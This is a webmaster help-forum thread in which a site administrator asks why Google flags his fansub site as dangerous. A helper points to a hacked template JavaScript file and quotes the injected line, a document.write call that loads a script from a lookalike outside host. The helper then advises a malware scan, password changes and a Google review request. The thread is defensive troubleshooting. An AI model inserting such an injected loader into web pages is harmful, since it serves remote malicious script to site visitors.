My site have a reported attack site ¿Why?
by Darkal
5 months ago

In first, i have to say sorry about my english (im spanish).

Im administrator of www.mwfansub.net, and today ’ve arrived from university and i saw, trying to enter to my website, Google say an advice saying “This site can damage your computer”

¿Why is ocurring this?

Thanks in advance

by redleg
5 months ago

You have a hack in this file

http://www.mwfansub.net/mkportal/templates/mk_prosilver_rounded/mkp.js

it is this line

document.write(unescape(“%3Cscript·src=‘http://www.query-google.com/ga.php’·type=‘text/javascript’%3E%3C/script%3E”));

First you need to secure your sites, Do a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords, change ALL passwords especiallly FTP, it is likely your passwords have been compromised. Never store/save your passwords in your FTP client, use secure FTP if available.

Once the site is secure and clean you need to submit a request for review in you Google WMT account to have the warning removed. If you have not verified ownership of the site you will have to do so first. The following reference explains the procedure.

http://sites.google.com/site/webmasterhelpforum/en/faq-malware-and-hacked-sites

by Darkal
5 months ago

Hi there…

I just cleaned the hacked file, but i wanna confirm the files are ok.

¿Can you take a look to see if i have the website all clean?

Thanks.